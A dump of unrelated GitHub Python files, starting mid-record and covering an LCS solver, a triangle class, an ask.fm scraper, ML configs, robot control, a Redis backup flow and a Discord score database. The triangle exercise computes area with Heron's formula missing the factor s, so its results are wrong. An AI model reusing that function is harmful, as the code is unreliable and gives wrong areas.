------------------------------------------------------------------------------------------------------------------\n\"\"\"##############################################################################################################\"\"\"","repo_name":"Programapython/gui_progra_2","sub_path":"funciones/funcionesGenerales.py","file_name":"funcionesGenerales.py","file_ext":"py","file_size_in_byte":7109,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70951077833","text":"import time\n\n\nclass CommandHelp:\n def __init__(self, help_lines: list[str], reset_time: int = 1.5):\n #A list containing all the help lines.\n self.help_lines = help_lines\n #After how long the \n self.reset_time = reset_time\n\n self.current_reset_time = 0\n self.current_line = 0\n\n\n #Gets the help line corresponding to the current index, then increments it by one.\n def get_help_line(self) -> str:\n line_count = len(self.help_lines)\n old_line = self.current_line\n self.current_reset_time = time.time()\n\n #We check if we are on the end of the help lines, if so we wrap around.\n if self.current_line == line_count - 1:\n self.current_line = 0\n #Otherwise we just increment the counter.\n else:\n self.current_line += 1\n\n #Return the appropriate help line with a counter.\n return f\"Command help {old_line + 1}/{line_count}: {self.help_lines[old_line]}\"\n\n\n def help_line_handler(self) -> None:\n #If the time after the last press exceeds the reset time we reset the line counter.\n if time.time() >= self.current_reset_time + self.reset_time:\n self.current_line = 0\n","repo_name":"Tinch334/Console-editor-rewrite","sub_path":"actions/command_help.py","file_name":"command_help.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"72935646471","text":"def lcs(s: str, t: str) -> int:\n n, m = len(s), len(t)\n dp = [0 for _ in range(m + 1)]\n for i in range(n):\n mem = dp[:]\n for j in range(m):\n if s[i] == t[j]:\n dp[j + 1] = mem[j] + 1\n elif dp[j + 1] < dp[j]:\n dp[j + 1] = dp[j]\n return dp[m]\n\nn = int(input())\nfor _ in range(n):\n s = input()\n t = input()\n print(lcs(s, t))\n","repo_name":"7riatsu/aoj","sub_path":"courses/alds/1_10/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11252020360","text":"import math\r\n\r\n\r\nclass nijeTrokutError(Exception):\r\n pass\r\n\r\n\r\nclass Trokut():\r\n def __init__(self, a, b, c):\r\n self.__stranice = []\r\n\r\n if (a >= 0 and b >= 0 and c >= 0) and (a + b > c and a + c > b and b + c > a):\r\n self.__a = a\r\n self.__b = b\r\n self.__c = c\r\n self.__stranice.append(a)\r\n self.__stranice.append(b)\r\n self.__stranice.append(c)\r\n else:\r\n raise Exception(\"Nije trokut\")\r\n\r\n def __str__(self):\r\n return f\"Trokut {self.__a}, {self.__b}, {self.__c}\"\r\n\r\n def __repr__(self):\r\n return f\"Trokut({self.__a}, {self.__b}, {self.__c})\"\r\n\r\n def opseg(self):\r\n return self.__a + self.__b + self.__c\r\n\r\n def povrsina(self):\r\n s = self.opseg() / 2\r\n return math.sqrt((s - self.__a) * (s - self.__b) * (s - self.__c))\r\n\r\n\r\nclass JednakokracniTrokut(Trokut):\r\n def __init__(self, baza, krak):\r\n a = baza\r\n b = krak\r\n c = krak\r\n Trokut.__init__(self, a, b, c)\r\n\r\n\r\nclass JednakostranicniTrokut(Trokut):\r\n def __init__(self, baza):\r\n a = baza\r\n b = baza\r\n c = baza\r\n Trokut.__init__(self, a, b, c)\r\n\r\n\r\nprint('*** test 1 ***')\r\nlista_stranica = [(1, 2, 3), (3, 4, 5), (3, 4, 4), (3, 3, 3)]\r\nfor stranice in lista_stranica:\r\n try:\r\n t = Trokut(*stranice)\r\n print(repr(t))\r\n except Exception as e:\r\n print(e, stranice)\r\n\r\nprint('*** test 2 ***')\r\nlista_stranica = [(3, 4, 5), (3, 4, 4), (3, 3, 3)]\r\nfor stranice in lista_stranica:\r\n t = Trokut(*stranice)\r\n print('%r ima opseg %.3f i povrsinu %.3f' % (t, t.opseg(), t.povrsina()))\r\n\r\nprint('*** test 3 ***')\r\ntrokuti = [Trokut(3, 4, 5), JednakokracniTrokut(3, 4),\r\n JednakostranicniTrokut(5)]\r\nfor t in trokuti:\r\n print(t)\r\n","repo_name":"josip2312/Programsko-Inzenjerstvo","sub_path":"vjezbe4/trokut..py","file_name":"trokut..py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"18803485291","text":"from requests_html import *\nfrom tkinter import *\n\nex=Tk()\nex.title(\"أرشيف\")\nex.geometry(\"600x700+250+250\")\ns = HTMLSession()\nr=s.get(\"https://ask.fm/KareemAHelmy2\")\nn=int(r.html.find('.profileTabAnswerCount ',first=True).text)\nfilename = input(\"filename: \")\nwith open(filename+\".txt\", \"w\", encoding=\"utf-8\") as f:\n for m in range(n):\n x=r.html.find(\".streamItem_header\")[m]\n y=r.html.find(\".streamItem_content\")[m]\n f.write(f\"السؤال: {x.text} \\n \\n الجواب: {y.text} \\n {'*'*50} \\n\")\n\n","repo_name":"mahmoud1817/mine","sub_path":"python/projects/archive.py","file_name":"archive.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73406988551","text":"from typing import List, Optional, Text, Tuple\n\nimport ml_collections\nfrom core.lib import metrics\n\nConfig = ml_collections.ConfigDict\nEvaluationMetric = metrics.EvaluationMetric\n\n\ndef default_config():\n \"\"\"The default config.\"\"\"\n config = Config()\n\n # Trainer configs\n config.multidevice: bool = True\n config.restore_checkpoint_dir: Optional[Text] = ''\n config.finetune: Text = 'ALL' # If set, indicates which set of parameters to load from the restore_checkpoint.\n config.binary_targets: bool = False # If True, 1 = error, 0 = no error.\n config.study_id: Optional[Text] = '' # A study is a way of organizing experiments.\n config.experiment_id: Optional[Text] = '' # An experiment is launched by a single command, may have multiple runs.\n config.run_id: Optional[Text] = '' # A run is a single trainer run with a single set of hparams. run_id should identify hparams.\n config.notes: Optional[Text] = '' # Any notes to record about the run.\n config.use_in_dataset_field = True\n\n # Training configs\n config.train_steps = 0 # 0 means run forever.\n config.seed = 0\n config.optimizer = 'adam' # sgd, adam\n config.learning_rate = 0.03\n config.grad_clip_value: float = 0.0 # 0 means no clipping.\n\n # Model HParams\n config.model_class: Text = 'IPAGNN' # IPAGNN, Transformer, LSTM\n config.raise_in_ipagnn: bool = False\n config.rnn_layers = 2\n config.hidden_size: int = 16\n config.span_encoding_method = 'first' # first, mean, max, sum\n config.permissive_node_embeddings = True\n config.raise_decision_offset = 0.0\n\n # TODO(dbieber): Switch to \"use_conditioning\" or similar.\n config.use_film: bool = False\n config.use_cross_attention: bool = False\n config.docstring_transformer_num_layers: int = 2\n config.cross_attention_num_heads = 1\n config.modulate_mode = 'add'\n\n # Compressive IPA-GNN configs\n config.use_compressive_ipagnn = False\n config.compressive_max_skip = 10\n config.compressive_mask_maker = 'default'\n\n # GGNN Configs\n config.ggnn_use_exit_node_embedding = False\n config.ggnn_use_fixed_num_layers = True\n config.ggnn_layers = 3\n\n # Dataset filtering and configs\n config.epochs: Optional[int] = 0\n config.batch_size: int = 128\n config.allowlist: Optional[List[int]] = None\n config.max_tokens: int = 512\n config.max_num_nodes: int = 128\n config.max_num_edges: int = 128\n config.max_steps: int = 174\n\n # Transformer configs\n config.transformer_emb_dim: int = 512\n config.transformer_num_heads: int = 8\n config.transformer_num_layers: int = 6\n config.transformer_qkv_dim: int = 512\n config.transformer_mlp_dim: int = 2048\n config.transformer_dropout_rate: float = 0.1\n config.transformer_attention_dropout_rate: float = 0.1\n config.mil_pool = 'max'\n\n # RNN baseline configs\n config.rnn_input_embedder_type = \"node\" # token, node\n\n # Runner configs\n config.eval_freq = 10000\n config.save_freq = 5000\n config.eval_primary_metric_scale: int = 1 # 1 or -1\n config.eval_primary_metric_name: str = EvaluationMetric.ACCURACY.value\n config.eval_metric_names: Tuple[str] = metrics.all_metric_names()\n config.eval_subsample = 1.0\n config.eval_max_batches = 30\n config.unsupervised_localization: bool = True # Must be set to True to compute localization logits.\n\n # Logging\n config.printoptions_threshold = 256\n\n config.early_stopping_on = False\n config.early_stopping_delta = 0.001\n config.early_stopping_threshold = 4\n return config\n\n\ndef get_config():\n \"\"\"Gets the config.\"\"\"\n config = default_config()\n config.lock()\n return config\n\n\ndef get_test_config():\n config = default_config()\n config.multidevice = False\n config.eval_max_batches = 2\n config.hidden_size = 10\n config.span_encoding_method = 'first'\n config.max_tokens = 64\n\n config.transformer_emb_dim = 32\n config.transformer_num_heads = 4\n config.transformer_num_layers = 2\n config.transformer_qkv_dim = 32\n config.transformer_mlp_dim = 64\n config.transformer_dropout_rate = 0.1\n config.transformer_attention_dropout_rate = 0.1\n return config\n","repo_name":"google-research/runtime-error-prediction","sub_path":"config/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"27"} +{"seq_id":"72853498631","text":"import numpy as np\n\nfrom firedrake import File, SpatialCoordinate\n\nfrom src import utils\nfrom src.curves import CURVES, Reparameterisation\nfrom src.manufactured_solutions import (\n MANUFACTURED_SOLUTIONS_PATH, MANUFACTURED_SOLUTIONS_MOMENTUM, MESH_RESOLUTIONS, MANUFACTURED_SOLUTIONS_PARAMS,\n ManufacturedSolution,\n)\nfrom src.mesh_generation import MeshGenerationParameters, generate_mesh\nfrom src.shooting import ShootingParameters, GeodesicShooter\n\n\nif __name__ == \"__main__\":\n logger = utils.Logger(MANUFACTURED_SOLUTIONS_PATH / \"manufactured_solutions.log\", )\n\n shooting_parameters = ShootingParameters()\n shooting_parameters.time_steps = 15\n shooting_parameters.alpha = 0.5\n time_steps_reparam = 15\n\n for template in CURVES:\n for resolution in MESH_RESOLUTIONS:\n logger.info(f\"Generating mesh for curve: '{template.name}' with resolution: h={resolution}.\")\n\n mesh_params = MeshGenerationParameters(mesh_size=resolution)\n mesh_path = generate_mesh(mesh_params, template, MANUFACTURED_SOLUTIONS_PATH)\n\n for momentum in MANUFACTURED_SOLUTIONS_MOMENTUM:\n # shooting\n logger.info(f\"Shooting with `{momentum.name}`.\")\n shooter = GeodesicShooter(logger, mesh_path, template, shooting_parameters)\n\n template_and_momentum_name = f\"{mesh_path.stem}_{momentum.name}\"\n path = mesh_path.parent / template_and_momentum_name\n path.mkdir(exist_ok=True)\n # logging\n logger.info(f\"Logging to `{path}`.\")\n for parameterisation in MANUFACTURED_SOLUTIONS_PARAMS:\n n_cells = len(parameterisation)\n values = np.random.normal(loc=0, scale=.1, size=n_cells)\n reparam = Reparameterisation(n_cells, values=values)\n reparameterised_points = reparam.exponentiate(parameterisation, time_steps_reparam)\n template_points = template.at(reparameterised_points)\n\n curve_result = shooter.shoot(momentum)\n target = np.array(curve_result.diffeo.at(template_points))\n momentum_function = shooter.momentum_function()\n momentum_expr = momentum.signal(*SpatialCoordinate(shooter.mesh))\n momentum_function.interpolate(momentum_expr)\n noise = np.random.normal(loc=0, scale=.1, size=target.shape)\n target += noise\n\n # dump the solution\n mf = ManufacturedSolution(\n template=template,\n target=target,\n noise=noise,\n mesh_path=mesh_path,\n momentum=momentum,\n reparam_values=values,\n reparam=reparam,\n parameterisation=parameterisation,\n )\n mf.dump(path)\n logger.info(f\"Wrote solution to {path / mf.name()}.\")\n\n # move mesh via linear projection and dump pvd files\n shooter.update_mesh()\n File(path / f\"{mesh_path.stem}_{momentum.name}.pvd\").write(shooter.shape_function)\n","repo_name":"andreasbock/planar-curve-matching","sub_path":"src/examples/run_manufactured_solutions.py","file_name":"run_manufactured_solutions.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"4974192512","text":"from import_export import resources\nfrom tablib import Dataset\nfrom callback.models import CallBack\nfrom category.models import Category\nfrom feedback.models import Feedback\nfrom order.models import Order\nfrom product.models import Product, ProductManager, Add, AddManager, Labels\nfrom section.models import SharesSection, DocumentSection, HowToSection, \\\n ContactSection, EmailSection, SocialSection, OrderSection, FooterSectionText, \\\n Votes\nfrom subscribers.models import Subscriber\nfrom tag.models import Tag\n\nMODELS_LIST = [\n CallBack,\n Category,\n Feedback,\n Order,\n Product,\n ProductManager,\n Add,\n AddManager,\n Labels,\n SharesSection,\n DocumentSection,\n HowToSection,\n ContactSection,\n EmailSection,\n SocialSection,\n OrderSection,\n FooterSectionText,\n Votes,\n Subscriber,\n Tag,\n ]\n\ndef resources_objects_factory(_model):\n class DynamicResource(resources.ModelResource):\n model_name = _model.__name__\n class Meta:\n model = _model\n #class Meta:\n # model = model\n #DynamicResource.Meta = Meta\n print(\"Model Resource - %s - created\" % _model)\n return DynamicResource()\n\ndef main():\n for model in MODELS_LIST:\n resource = resources_objects_factory(model)\n dataset = resource.export()\n with open('csv_files/%s.csv' % str(resource.model_name), 'w') as file:\n file.write(dataset.csv)\n\n\ndef import_data():\n for model in MODELS_LIST:\n resource = resources_objects_factory(model)\n dataset = Dataset()\n with open('csv_files/%s.csv' % str(resource.model_name), 'r') as file:\n imported_data = dataset.load(file.read())\n\n result = resource.import_data(imported_data, dry_run= True)\n\n if not result.has_errors():\n resource.import_data(dataset, dry_run= False)\n\nif __name__ == \"__main__\":\n main()\n\n\"\"\"\nfrom migration_to_mysql import resources_objects_factory, MODELS_LIST\ntest_resource = resources_objects_factory(MODELS_LIST[0])\ndataset = test_resource.export()\nwith open('%s.csv' % str(test_resource.model_name), 'w') as file:\n file.write(dataset.csv)\n\n\n# import data\nfrom migration_to_mysql import resources_objects_factory, MODELS_LIST\nfor model in MODELS_LIST:\n resource = resources_objects_factory(model)\n dataset = Dataset()\n with open('csv_files/%s.csv' % str(resource.model_name), 'r') as file:\n imported_data = dataset.load(file.read())\n\n result = resource.import_data(imported_data, dry_run= True)\n print(result.has_errors())\n\n# if not result.has_errors():\n# resource.import_data(dataset, dry_run= False)\n\n\"\"\"\n","repo_name":"OscarGibson/yakudza-backend","sub_path":"migration_to_mysql.py","file_name":"migration_to_mysql.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"15668107469","text":"\"\"\"def isPrime(num):\n if num == 0 or num == 1:\n return False\n else:\n for i in range(2, int(num / 2) + 1):\n if num % i == 0:\n return False\n return True\n\ndef perfectNum(num):\n sum = 0\n for i in range(1, int(num / 2) + 1):\n if num % i == 0:\n sum += i\n if num == sum:\n return True\n else:\n return False\n\nfor i in range(1, 1000):\n if perfectNum(i):\n print(i)\n\n\"\"\"\ndef ebob(num1, num2):\n minimum = min(num1, num2)\n maximum = max(num1, num2)\n ebob = 1\n for i in range(1, minimum + 1):\n if minimum % i == 0 and maximum % i == 0 and i > ebob:\n ebob = i\n\n print(ebob)\n\n\n\ndef ekok(num1, num2):\n minimum = min(num1, num2)\n maximum = max(num1, num2)\n for i in range(1, minimum + 1):\n if (i * maximum) % minimum == 0:\n return i * maximum\n\n\nprint(ekok(6, 7))\n\n\n\ndef okunus(num):\n if num / 10 >= 1:\n\n dict1 = {1 : \"bir\", 2 : \"iki\", 3 : \"üç\", 4 : \"dört\", 5 : \"beş\", 6 : \"altı\", 7 : \"yedi\", 8 : \"sekiz\", 9 : \"dokuz\", 0 : \"\"}\n dict2 = {1 : \"on\", 2 : \"yirmi\", 3 : \"otuz\", 4 : \"kırk\", 5 : \"elli\", 6 : \"altmış\", 7 : \"yetmiş\", 8 : \"seksen\", 9 : \"doksan\"}\n print(dict2[num // 10], dict1[num % 10])\n else:\n print(\"Lütfen 2 basamaklı bir sayı girin!\")\n\ndef pisagor():\n for i in range(1, 101):\n for j in range(1, 101):\n c = (i**2 + j**2) ** 0.5\n if (c == int(c)):\n print(\"a:\", i ,\"b:\", j, \"c:\", int(c))\n\n\n\n","repo_name":"MuhammedUlviOzkaya/old-codes-python-java","sub_path":"PycharmProjects/Summer2020/Advanced/IsPrime.py","file_name":"IsPrime.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8064281779","text":"#!/usr/bin/env python3\n# rospy - ROS Python API\nimport rospy\nimport baxter_interface\n\n\ndef hello_baxter():\n # initialize our ROS node, registering it with the Master\n\n # get the right limb's current joint angles\n left_arm = baxter_interface.limb.Limb(\"left\")\n right_arm = baxter_interface.limb.Limb(\"right\")\n # left_joint_angels = left_arm.joint_angles()\n # right_joint_angels = right_arm.joint_angles()\n\n baxter_interface.RobotEnable().enable()\n\n rospy.loginfo(\"Moving to neutral pose...\")\n left_arm.move_to_neutral()\n right_arm.move_to_neutral()\n\n # store the first wave position\n right_wave_1 = {\n \"right_s0\": -0.459,\n \"right_s1\": -0.202,\n \"right_e0\": 1.807,\n \"right_e1\": 1.714,\n \"right_w0\": -0.906,\n \"right_w1\": -1.545,\n \"right_w2\": -0.276,\n }\n left_wave_1 = {\n \"left_s0\": -0.459,\n \"left_s1\": -0.202,\n \"left_e0\": 1.807,\n \"left_e1\": 1.714,\n \"left_w0\": -0.906,\n \"left_w1\": -1.545,\n \"left_w2\": -0.276,\n }\n\n # store the second wave position\n right_wave_2 = {\n \"right_s0\": -0.395,\n \"right_s1\": -0.202,\n \"right_e0\": 1.831,\n \"right_e1\": 1.981,\n \"right_w0\": -1.979,\n \"right_w1\": -1.100,\n \"right_w2\": -0.448,\n }\n left_wave_2 = {\n \"left_s0\": -0.395,\n \"left_s1\": -0.202,\n \"left_e0\": 1.831,\n \"left_e1\": 1.981,\n \"left_w0\": -1.979,\n \"left_w1\": -1.100,\n \"left_w2\": -0.448,\n }\n\n # wave three times\n rospy.loginfo(\"Hello\")\n for _move in range(2):\n left_arm.move_to_joint_positions(left_wave_1)\n right_arm.move_to_joint_positions(right_wave_1)\n left_arm.move_to_joint_positions(left_wave_2)\n right_arm.move_to_joint_positions(right_wave_2)\n","repo_name":"nakata5321/Baxter_simulation_controller","sub_path":"src/Hello_baxter.py","file_name":"Hello_baxter.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12604851033","text":"class PredicateInduction(object):\n \n def __init__(self, target, attribute_predicates, score_func):\n self.target = target\n self.attribute_predicates = attribute_predicates\n self.score_func = score_func\n self.predicate_score = {}\n self.predicate_res = {}\n \n def score(self, predicate, **kwargs):\n if predicate.__repr__() not in self.predicate_score:\n score, res = self.score_func(self.target, predicate.mask, None, True, **kwargs)\n self.predicate_score[predicate.__repr__()] = score\n self.predicate_res[predicate.__repr__()] = res\n return self.predicate_score[predicate.__repr__()]\n\n def merge_predicate_attribute_adjacent(self, predicate, adjacent, attribute):\n children = [p for p,p_ in adjacent if self.score(p)>self.score(p_) and self.score(p)>self.score(predicate)]\n return children\n \n def expand_predicate_attribute(self, predicate, attribute):\n adjacent = predicate.get_adjacent_attribute_outer(attribute)\n children = self.merge_predicate_attribute_adjacent(predicate, adjacent, attribute)\n if len(children)>0:\n return self.expand_predicate_attribute(max(children, key=lambda x: self.score(x)), attribute)\n else:\n return predicate\n \n def fit_predicate_attribute(self, predicate, attribute):\n adjacent = predicate.get_adjacent_attribute_inner(attribute) + predicate.get_adjacent_attribute_outer(attribute)\n children = self.merge_predicate_attribute_adjacent(predicate, adjacent, attribute)\n if len(children)>0:\n return self.fit_predicate_attribute(max(children, key=lambda x: self.score(x)), attribute)\n else:\n return predicate\n \n def fit_other_attributes(self, predicate, attribute):\n for other_attribute in predicate.attribute_values.keys():\n if predicate.dtypes[other_attribute] != 'nominal':\n predicate = self.fit_predicate_attribute(predicate, other_attribute)\n return predicate\n \n def expand_predicate(self, predicate):\n new_predicates = []\n for k,v in self.attribute_predicates.items():\n if k not in predicate.attribute_values.keys():\n for p in v:\n new_predicate = predicate.add_attribute(p, k)\n if not new_predicate.is_contained_any(new_predicates):\n if predicate.dtypes[k] != 'nominal':\n new_predicate = self.expand_predicate_attribute(new_predicate, k)\n new_predicate = self.fit_other_attributes(new_predicate, k)\n if self.score(new_predicate) > self.score(predicate):\n new_predicates.append(new_predicate)\n return new_predicates\n \n def insert_sorted(self, lst, predicate, breadth_first=False):\n if len(lst) == 0:\n lst.append(predicate)\n return 1\n score = self.score(predicate)\n for i in range(len(lst)):\n i_score = self.score(lst[i])\n if (score > i_score and not breadth_first) or (score > i_score and len(predicate.attribute_values)<=len(lst[i].attribute_values)):\n lst.insert(i, predicate)\n return i\n lst.append(predicate)\n return len(lst)\n \n def insert_sorted_all(self, lst, predicates, breadth_first=False):\n for predicate in predicates:\n self.insert_sorted(lst, predicate, breadth_first)\n \n def search(self, predicates=None, breadth_first=False, num_clauses=None):\n if predicates is None:\n predicates = [a for b in self.attribute_predicates.values() for a in b]\n self.accepted = {i+1: [] for i in range(len(self.attribute_predicates))}\n frontier = sorted(predicates, key=lambda x: self.score(x), reverse=True)\n while len(frontier)>0:\n print(len(frontier))\n# print({k: len(v) for k,v in accepted.items()})\n predicate = frontier.pop(0)\n# print(predicate, self.score(predicate))\n print(predicate, self.score(predicate))\n if not predicate.is_contained_any([a for b in [v for k,v in self.accepted.items() if k>=len(predicate.attribute_values)] for a in b]+frontier):\n if num_clauses is None or len(predicate.attribute_values)0:\n self.insert_sorted_all(frontier, new_predicates, breadth_first)\n else:\n if self.score(predicate)>0:\n self.insert_sorted(self.accepted[len(predicate.attribute_values)], predicate)\n else:\n if self.score(predicate)>0:\n self.insert_sorted(self.accepted[len(predicate.attribute_values)], predicate)\n return self.accepted\n","repo_name":"jrogerthat/pixal-react","sub_path":"backend/predicate_induction/predicate_induction.py","file_name":"predicate_induction.py","file_ext":"py","file_size_in_byte":5077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8076956961","text":"import copy\nimport logging.config\nfrom dataclasses import asdict\nfrom typing import Dict\n\nfrom django.utils.translation import ugettext as _\n\nfrom backend.db_meta.enums.cluster_type import ClusterType\nfrom backend.flow.engine.bamboo.scene.common.builder import SubBuilder\nfrom backend.flow.engine.bamboo.scene.redis.common.exceptions import TendisGetBinlogFailedException\nfrom backend.flow.plugins.components.collections.redis.redis_download_backup_files import (\n RedisDownloadBackupfileComponent,\n)\nfrom backend.flow.utils.redis.redis_context_dataclass import (\n ActKwargs,\n CommonContext,\n DownloadBackupFileKwargs,\n RedisDataStructureContext,\n)\n\nlogger = logging.getLogger(\"flow\")\n\n\ndef redis_backupfile_download(\n root_id: str, ticket_data: dict, cluster_info: dict, sub_kwargs: ActKwargs, param: Dict\n) -> SubBuilder:\n \"\"\"\n redis 指定时间拉取远程备份文件用于后续的数据构造\n @param root_id: flow 流程root_id\n @param ticket_data: 关联单据 ticket对象\n @param cluster_info: 关联的cluster对象\n \"\"\"\n\n sub_pipeline = SubBuilder(root_id=root_id, data=copy.deepcopy(ticket_data))\n # 全备份文件下载\n task_ids = [file_info[\"task_id\"] for file_info in param[\"full_file_list\"]]\n download_kwargs = DownloadBackupFileKwargs(\n bk_cloud_id=cluster_info[\"bk_cloud_id\"],\n task_ids=task_ids,\n dest_ip=param[\"new_temp_ip\"],\n dest_dir=param[\"dest_dir\"],\n reason=\"redis data structure full backup file download\",\n )\n sub_pipeline.add_act(\n act_name=_(\"下载{}全备文件到{}\").format(param[\"source_ip\"], param[\"new_temp_ip\"]),\n act_component_code=RedisDownloadBackupfileComponent.code,\n kwargs=asdict(download_kwargs),\n )\n\n # cache类型的情况,只有全备份文件,ssd和tendisplus 必须有binlog文件\n if param[\"tendis_type\"] in [ClusterType.TendisplusInstance.value, ClusterType.TendisSSDInstance.value]:\n\n if len(param[\"binlog_file_list\"]) == 0:\n raise TendisGetBinlogFailedException(\n message=_(\"集群类型为:{},但是下载的binlog备份信息为0,不符合预期,最少有2个binlog\".format(param[\"tendis_type\"]))\n )\n # binlog文件下载\n task_ids = [file_info[\"task_id\"] for file_info in param[\"binlog_file_list\"]]\n download_kwargs = DownloadBackupFileKwargs(\n bk_cloud_id=cluster_info[\"bk_cloud_id\"],\n task_ids=task_ids,\n dest_ip=param[\"new_temp_ip\"],\n dest_dir=param[\"dest_dir\"],\n reason=\"redis data structure binlog backup file download\",\n )\n sub_pipeline.add_act(\n act_name=_(\"下载{}binlog文件到{}\").format(param[\"source_ip\"], param[\"new_temp_ip\"]),\n act_component_code=RedisDownloadBackupfileComponent.code,\n kwargs=asdict(download_kwargs),\n )\n\n return sub_pipeline.build_sub_process(sub_name=_(\"下载备份文件到{}\".format(param[\"new_temp_ip\"])))\n","repo_name":"TencentBlueKing/blueking-dbm","sub_path":"dbm-ui/backend/flow/engine/bamboo/scene/redis/redis_data_structure_sub.py","file_name":"redis_data_structure_sub.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"27"} +{"seq_id":"22146883516","text":"import tensorflow.compat.v2 as tf\n\ntf.enable_v2_behavior()\n\n\ndef trapezoid(integral, x_start, x_stop, dx):\n \"\"\"\n Integrate function using trapezoid rule as Tensorflow's odeint() is much slower\n\n Args:\n integral (function): Function that takes 'x' as argument and returns y\n x_start (tensor): Rank-0 tensor of x value to start at\n x_stop( tensor): Rank-0 tensor of x value to stop at\n dx (tensor): Rank-0 tensor of # of trapezoids\n\n Return:\n tensor: Rank-0 tensor of integrated value. Has the the same dtype as integral() returns\n \"\"\"\n # Generate points to integrate\n steps = tf.cast((x_stop - x_start) / dx, dtype=tf.int32)\n x = tf.linspace(x_start, x_stop, steps + 1)\n\n # Get tensor of y values for our x points\n y = integral(x)\n\n # Make tensors of the start and end y values for our trapezoids\n # So if y=[10.0, 25.0, 45.0, 20.0]\n y_start = y[:-1] # ... [10.0, 25.0, 45.0]\n y_stop = y[1:] # ... [25.0, 45.0, 20.0]\n\n # Make a tensor of our trapezoid areas\n y_combined = tf.math.add(y_start, y_stop)\n trapezoids = (y_combined / tf.constant(2.0, dtype=y_combined.dtype)) * tf.cast(dx, dtype=y_combined.dtype)\n\n # Add the trapezoids together\n return tf.reduce_sum(trapezoids)\n","repo_name":"lejambon/b-decay-unbinned-machine-fit","sub_path":"b_meson_fit/integrate.py","file_name":"integrate.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11440234288","text":"from .models import Session, User, Log\nfrom datetime import datetime, timedelta\nimport uuid\n\n\nclass BaseDB:\n def __init__(self):\n self.db = Session().get_db()\n self.now_time = datetime.utcnow()\n self.now_timestamp = datetime.utcnow().timestamp()\n\n\nclass UserDB(BaseDB):\n def __init__(self, ctx):\n super().__init__()\n self.ctx = ctx\n self.check_in_fraction = 5 # TODO: 簽到獎勵\n self.user = None\n\n async def get_user(self, user_id):\n user = self.db.query(User).filter(User.id == user_id).first()\n return user if user else None\n\n async def get_users(self):\n return self.db.query(User).all()\n\n async def get_user_fractions(self, user_id):\n user = await self.get_user(user_id)\n if user is None:\n return 0\n return user.fraction\n\n async def get_leader_board(self, old=False):\n users = await self.get_users()\n data = sorted(users, key=lambda user: user.old_fraction if old else user.fraction, reverse=True)\n return data\n\n async def crate_user(self, user_id, user_name, old_fraction, fraction):\n user = User(id=user_id, name=user_name, old_fraction=old_fraction,\n fraction=fraction, update_time=self.now_time)\n self.db.add(user)\n self.db.commit()\n return user\n\n async def check_user_in_db(self, user_id, user_name, fraction=0):\n user = await self.get_user(user_id)\n if user is None:\n fraction = 0 if fraction < 0 else fraction\n return await self.crate_user(user_id, user_name, 0, fraction)\n return user\n\n async def update_user_fraction(self, user, fraction):\n self.user = user\n user_name = f\"{self.user.name}#{self.user.discriminator}\"\n user = await self.check_user_in_db(self.user.id, user_name, fraction)\n if user is None:\n return False\n\n user.fraction += fraction\n user.fraction = 0 if user.fraction < 0 else user.fraction\n\n user.name = user_name\n user.update_time = self.now_time\n self.db.commit()\n return user\n\n async def update_user_sign_in(self, user):\n self.user = user\n user_name = f\"{self.user.name}#{self.user.discriminator}\"\n user = await self.check_user_in_db(self.user.id, user_name)\n yesterday = self.now_time.date() - timedelta(days=1)\n\n if user is None:\n return 'Unknown error occurred, failed to create user.', 0, \"Null\"\n if user.last_sign_in is not None and user.last_sign_in.date() == self.now_time.date():\n return 'You have already checked in today.', 0, user.fraction\n if user.last_sign_in is None or user.last_sign_in is not None and user.last_sign_in and user.last_sign_in.date() != yesterday:\n user.consecutive_sign_in = 1\n else:\n user.consecutive_sign_in += 1\n user.fraction += self.check_in_fraction\n user.last_sign_in = self.now_time\n self.db.commit()\n await LogDB().add_log(self.user.id, event='Check-in') # TODO: 紀錄簽到事件\n return f'Daily check-in completed.', self.check_in_fraction, user.fraction\n\n async def settle_accounts(self, days, award):\n users = await self.get_users()\n\n for user in users:\n if user.consecutive_sign_in >= days: # TODO: 連續簽到天數大於等於設定天數給予獎勵分\n user.fraction += award\n\n user.old_fraction = user.fraction # TODO: 將目前分數轉移至舊分數給排行榜使用\n user.fraction = 0 # TODO: 結算完後將分數歸零\n user.consecutive_sign_in = 0 # TODO: 將連續簽到天數歸零\n\n self.db.commit()\n return True\n\n\nclass LogDB(BaseDB):\n def __init__(self):\n super().__init__()\n\n async def add_log(self, user_id, event):\n log = Log(id=uuid.uuid4(), event_time=self.now_time, user_id=user_id, event=event)\n self.db.add(log)\n self.db.commit()\n return log\n\n async def get_logs(self, user_id, event=None):\n logs = self.db.query(Log).filter(Log.user_id == user_id).all()\n if event and logs:\n logs = [log for log in logs if log.event == event]\n return logs if logs else 